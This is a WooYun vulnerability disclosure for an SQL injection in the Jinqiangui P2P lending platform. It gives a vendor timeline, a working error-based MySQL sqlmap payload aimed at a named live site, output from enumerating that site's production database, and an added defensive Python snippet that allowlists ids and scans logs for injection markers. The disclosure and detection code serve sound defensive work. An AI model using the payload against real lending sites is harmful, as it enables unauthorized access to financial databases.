Vulnerability summary

Defect ID: wooyun-2015-0133935

Title: Another SQL injection vulnerability in the Jinqiangui (金钱柜) P2P lending system affects a large number of lending sites

Vendor: Shandong Jinqiangui Network Technology Co., Ltd. (山东金钱柜网络科技有限公司)

Author: 路人甲

Submitted: 2015-08-13 19:35

Fixed: 2015-11-13 12:56

Disclosed: 2015-11-13 12:56

Type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-08-13: Details sent to the vendor, awaiting vendor handling
2015-08-15: Vendor confirmed; details disclosed to the vendor only
2015-08-18: Details opened to third-party security partners
2015-10-09: Details disclosed to core white hats and experts in related fields
2015-10-19: Details disclosed to regular white hats
2015-10-29: Details disclosed to intern white hats
2015-11-13: Details disclosed to the public

Summary:

The previous injection vulnerability was fixed, and another injection vulnerability has been found.

Details:

Affected sites:

The report lists eight sites exposing the vulnerable page under /invest/full_success/ and a further 28 affected domains (the raw domain lists are omitted here). Some of these sites are not Jinqiangui customers.

Proof of vulnerability:

sqlmap identified the following injection points with a total of 70 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: http://shenghaodai.com:80/invest/full_success/a20150800024 AND (SELECT 5926 FROM(SELECT COUNT(*),CONCAT(0x716e6c6a71,(SELECT (CASE WHEN (5926=5926) THEN 1 ELSE 0 END)),0x7173656971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a).html
---
web server operating system: Linux Ubuntu
web application technology: PHP 5.3.10
back-end DBMS: MySQL 5.0
current database: 'new_jqg2'
Database: new_jqg2
[75 tables]
An error occurred partway through; there are more than 390 tables, but only these came out. The rest could be continued by switching IP, but this is only for proof, so I did not go any deeper.
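The sqlmap output above shows an error-based MySQL injection through the id segment of the /invest/full_success/<id>.html path. The following Python is an added defensive example, not code from the report or the vendor: it allowlists the id format (assumed here to be the letter "a" plus 11 digits, as in the ids the report shows) and runs that check over constructed access-log lines to flag requests whose id segment carries the injection markers from the payload above.

```python
import re
from urllib.parse import unquote

# Allowlist for the investment-id page that the report shows is injectable.
# Ids in the report look like a20150800024; treating them as 'a' + 11 digits
# is an assumption about the id grammar, not something the report states.
VALID_PATH = re.compile(r"^/invest/full_success/a\d{11}\.html$")

# Markers of the error-based MySQL technique seen in the sqlmap payload above.
SQLI_MARKERS = re.compile(
    r"FLOOR\(RAND\(0\)\*2\)|INFORMATION_SCHEMA|\bSELECT\b.*\bFROM\b", re.IGNORECASE)

# Common Log Format: ip ident user [time] "method path proto" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3}) (\d+|-)')


def is_valid_invest_path(raw_path: str) -> bool:
    """True only if the URL-decoded path is exactly one well-formed id page."""
    return VALID_PATH.match(unquote(raw_path)) is not None


def flag_injection_attempts(lines):
    """Return (ip, decoded path, reason) for requests to the vulnerable route
    whose id segment is not a plain id; decoding first defeats %20 encoding."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in Common Log Format
        ip, _ts, _method, raw_path, _status, _size = m.groups()
        path = unquote(raw_path)
        if not path.startswith("/invest/full_success/") or VALID_PATH.match(path):
            continue
        reason = "sql-markers" if SQLI_MARKERS.search(path) else "malformed-id"
        hits.append((ip, path, reason))
    return hits


# Constructed sample log lines (not from the report): one normal request,
# one carrying a URL-encoded error-based payload, one malformed id.
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Aug/2015:19:35:01 +0800] "GET /invest/full_success/a20150800024.html HTTP/1.1" 200 5120',
    '203.0.113.9 - - [13/Aug/2015:19:35:07 +0800] "GET /invest/full_success/a20150800024%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a).html HTTP/1.1" 500 312',
    '203.0.113.9 - - [13/Aug/2015:19:35:09 +0800] "GET /invest/full_success/a2015080002.html HTTP/1.1" 404 208',
]

if __name__ == "__main__":
    for hit in flag_injection_attempts(SAMPLE_LOG):
        print(hit)
```

The same allowlist check, applied in the application before the id reaches any SQL (alongside a prepared statement), is the fix a vendor would apply; the log scan is for finding attempts against unpatched installations.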

Remediation:

Copyright notice: please credit the source 路人甲@乌云 when reposting.


Response

Vendor response:

Severity: High

Rank: 20

Confirmed: 2015-08-15 12:54

Vendor reply:

Thank you for your support. Thanks!

Latest status:

None yet

